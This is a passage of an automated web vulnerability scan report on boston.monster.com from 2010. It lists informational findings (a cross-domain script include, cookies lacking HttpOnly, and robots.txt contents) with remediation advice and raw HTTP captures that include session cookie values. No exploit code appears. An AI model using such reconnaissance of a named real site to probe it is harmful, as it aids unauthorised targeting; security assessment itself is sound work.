Set-Cookie: BackToJSRLink=q=%22boston.com%22&cy=us&cnme=boston&sid=40&re=100&jto=1&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:09:12 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:09:12 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154696
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
<meta name="SL.channelAlias" content="NEWSBOSWO" />
<link href="http://css-seeker.newjobs.com/NEWSBOSWO/v3.4.6.2090/global_css.axd" rel="stylesheet" type="text/css" />
<link href="http://css-seeker.newjobs.com/NEWSBOSWO/v3.4.6.831/js20_css.axd" rel="stylesheet" type="text/css" />
<script src="http://js-seeker.newjobs.com/NEWSBOSWO/v3.4.6.2027/global_js.axd" type="text/javascript"></script>
<script src="http://js-seeker.newjobs.com/NEWSBOSWO/v3.4.6.1271/js20_js.axd" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>
...[SNIP]...
<noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
</script><link id="ctl00_ctl00_ctl00_favIcon" rel="shortcut icon" href="http://media.newjobs.com/favicon.ico" /><meta name="DCSext.srn" content="1" />
...[SNIP]...
<div id="bostoncom_mastHead">
           <a href="http://www.boston.com/jobs/" class="bostoncom_imageLink">
           <img src=http://media.newjobs.com/mm/redux/logo/NEWSBOSWO_298x76.gif alt="Boston.com and Monster" border="0" height="76" width="298"></a>
...[SNIP]...
<span id="bostoncom_globeLogo"><a href="http://www.boston.com/bostonglobe" class="bostoncom_imageLink">
           <img src=http://media.newjobs.com/mm/redux/newspapers/NEWSBOSWO/images/glogo.jpg alt="The Boston Globe"></a>
...[SNIP]...
<li id="bostoncom_ghome"><a href="http://www.boston.com/">Home</a></li>
           <li id="bostoncom_gglobe"><a href="http://www.boston.com/bostonglobe/">Today's Globe</a>
...[SNIP]...
<li id="bostoncom_gnews"><a href="http://www.boston.com/news/">News</a></li>
           <li id="bostoncom_gbusiness"><a href="http://www.boston.com/business/">Business</a>
...[SNIP]...
<li id="bostoncom_gsports"><a href="http://www.boston.com/sports/">Sports</a>
...[SNIP]...
<li id="bostoncom_glifestyles"><a href="http://www.boston.com/lifestyle/">Lifestyle</a>
...[SNIP]...
<li id="bostoncom_gae"><a href="http://www.boston.com/ae/">A&amp;E</a>
...[SNIP]...
<li id="bostoncom_gthings"><a href="http://www.boston.com/thingstodo/">Things to Do</a>
...[SNIP]...
<li id="bostoncom_gtravel"><a href="http://www.boston.com/travel/">Travel</a>
...[SNIP]...
<li id="bostoncom_gcars" class="bostoncom_cfied"><a href="http://www.boston.com/cars/">Cars</a></li>
           <li id="bostoncom_gjobs" class="bostoncom_cfied bostoncom_active"><a href="http://www.boston.com/jobs/">Jobs</a></li>
           <li id="bostoncom_gre" class="bostoncom_cfied"><a href="http://www.boston.com/realestate/">Real Estate</a>
...[SNIP]...
<li id="bostoncom_gsearch" class="bostoncom_cfied"><a href="http://www.boston.com/search/">Local Search</a>
...[SNIP]...
<li><a href="http://boston.com/jobs/find/">Find a job</a>
...[SNIP]...
<li><a href="http://boston.com/jobs/industries/">Industries</a>
...[SNIP]...
<li><a href="http://boston.com/jobs/news/">News</a></li>
       <li><a href="http://boston.com/jobs/advice/">Advice</a></li>
       <li><a href="http://boston.com/jobs/employers/">For employers</a>
...[SNIP]...
<li><a href="http://boston.com/jobs/post/">Post a job</a>
...[SNIP]...
<li class="last"><a href="http://monster.prospero.com/" title="Advice Forums">Advice Forums</a>
...[SNIP]...
esultTransition();JobSearch20.Controls.ViewsSwitch.Views.changeView(JobSearch20.Controls.ViewsSwitch.Views.columnView);" onmouseover="javascript:hoverTabs(1);" onmouseout="javascript:unHoverTabs(1);" ><img class="tabLogoColumn" alt="" src="http://media.newjobs.com/mm/redux/jobsearch/tabSwitch/logo-columnView-active.gif" /><span id="ctl00_ctl00_ctl00_body_body_wacCenterStage__viewsSwitch__columnViewText">
...[SNIP]...
sultTransition();JobSearch20.Controls.ViewsSwitch.Views.changeView(JobSearch20.Controls.ViewsSwitch.Views.stackedView);" onmouseover="javascript:hoverTabs(0);" onmouseout="javascript:unHoverTabs(0);" ><img class="tabLogoStacked" alt="" src="http://media.newjobs.com/mm/redux/jobsearch/tabSwitch/logo-stackedView-inactive.gif" /><span id="ctl00_ctl00_ctl00_body_body_wacCenterStage__viewsSwitch__stackedViewText">
...[SNIP]...
<div id="transitionResultsContainer">
<img class="transitionResultsImg" id="transitionResultsImg" src="http://media.newjobs.com/mm/redux/ajax/loading.gif" alt=""></img>
...[SNIP]...
<div id="bostoncom_siteMap">
<img height="58" width="181" src=http://media.newjobs.com/mm/redux/newspapers/NEWSBOSWO/images/bcj_footer_logo_sm.gif /><br />
...[SNIP]...
<span class="bostoncom_smText"><a href="http://www.boston.com/jobs/about/">About us</a> | <a href="http://www.boston.com/jobs/mediakit/">Advertise</a>
...[SNIP]...
<div class="bostoncom_floatleft">
<a class="bostoncom_bd" href="http://www.boston.com/jobs/find/">Find a job</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/regions/">By Region/Town</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/commutes/">By Commute</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/">By Industry</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/browse/employers/">By Employer</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/college/">Student Center</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/search/">Adv. Search</a>
...[SNIP]...
<div class="bostoncom_floatleft">
<a class="bostoncom_bd" href="http://www.boston.com/jobs/industries/">Industries</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/biotech/">Biotechnology</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/education/">Education K-12</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/finance/">Finance</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/healthcare/">Healthcare</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/highered/">Higher Ed.</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/hospitality/">Hospitality/Retail</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/legal/">Legal</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/industries/technology/">Technology</a>
...[SNIP]...
<div class="bostoncom_floatleft">
<a class="bostoncom_bd" href="http://www.boston.com/jobs/news/?p1=BW_BOT_NEWS">News and Advice</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/news/">Boston.com Jobs in the Globe</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/advice/">Tips and advice</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/events/">Events</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/blog/">Job Blog</a>
...[SNIP]...
<li><a href="http://www.boston.com/community/forums.html#Jobs">Message boards</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/careerdevelopment/">Career Dev. &amp; Edu.</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/newsletters/">Newsletter</a>
...[SNIP]...
<div class="bostoncom_floatleft">
<a class="bostoncom_bd" href="http://www.boston.com/jobs/employers/">Employer</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/employers/">Employer Login</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/post/">Post a Job</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/hr/">HR Center</a>
...[SNIP]...
<li><a href="http://bostonglobe.com/advertiser/mediakit/categories.aspx?id=65">Media Kit</a>
...[SNIP]...
<li><a href="http://www.boston.com/jobs/employers/help/">Employer FAQ</a>
...[SNIP]...
<li class="bostoncom_first"><a href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a>
...[SNIP]...
<li><a href="http://www.boston.com/help/feedback/">Feedback</a>
...[SNIP]...
<li><a href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a>
...[SNIP]...
<li><a href="http://www.boston.com/help/privacy_policy/">Privacy Statement</a>
...[SNIP]...
<li><a href="http://www.boston.com/mobile/">Mobile</a>
...[SNIP]...
<li><a href="http://www.boston.com/tools/rss/">RSS feeds</a>
...[SNIP]...
<li><a href="http://www.boston.com/help/homepage/">Make Boston.com your home page</a>
...[SNIP]...
<li class="bostoncom_first"><a href="https://bostonglobe.com/aboutus/contact/default.asp">Contact The Boston Globe</a>
...[SNIP]...
<li><a href="https://bostonglobe.com/subscriber/subscribe/index.stm">Subscribe</a>
...[SNIP]...
<li><a href="https://bostonglobe.com/subscriber/custsrvc/index.stm">Manage your subscription</a>
...[SNIP]...
<li><a href="https://bostonglobe.com/advertiser/">Advertise</a>
...[SNIP]...
<li><a href="https://bostonglobe.com/subscriber/extras/">Boston Globe Extras</a>
...[SNIP]...
<li><a href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=boston.com&amp;kw=boston.com">Boston Globe Store</a>
...[SNIP]...
</div>


<script src="http://media.newjobs.com/js/wt/dcszd1jb4000000gs4nkdqgdf_5g8q.js" TYPE="text/javascript"></script>
...[SNIP]...

8. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /search.aspx HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:09:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fp5k4q453nd2jg454uhkncek; path=/; HttpOnly
Set-Cookie: split_scsjsv=57; domain=.monster.com; expires=Tue, 08-Nov-2011 07:09:10 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247789513977275; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 350060
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
<link href="http://css-seeker.newjobs.com/NEWSBOSWO/v3.4.6.831/js20_css.axd" rel="stylesheet" type="text/css" />
<script src="http://js-seeker.newjobs.com/NEWSBOSWO/v3.4.6.2027/global_js.axd" type="text/javascript"></script>
<script src="http://js-seeker.newjobs.com/NEWSBOSWO/v3.4.6.1271/js20_js.axd" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>
...[SNIP]...
</div>


<script src="http://media.newjobs.com/js/wt/dcszd1jb4000000gs4nkdqgdf_5g8q.js" TYPE="text/javascript"></script>
...[SNIP]...

9. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /search.aspx HTTP/1.1
Host: boston.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:09:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fp5k4q453nd2jg454uhkncek; path=/; HttpOnly
Set-Cookie: split_scsjsv=57; domain=.monster.com; expires=Tue, 08-Nov-2011 07:09:10 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.com; path=/
Set-Cookie: JSRTimeStamp=634247789513977275; domain=.monster.com; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.com; path=/
Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.com; path=/
Set-Cookie: TC_Top=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Sat, 09-Oct-2010 07:09:11 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 350060
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...

10. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston.monster.com
Path:   /search.aspx

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: boston.monster.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 08 Nov 2010 07:09:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 151

User-agent: *
Disallow: /ManageSavedSearch
Disallow: /ManageSavedJobs.aspx
Disallow: /ManageSavedSearch.aspx
Disallow: */DoNotAddToP4/UserControls/

Report generated by XSS.CX at Mon Nov 08 09:30:07 CST 2010.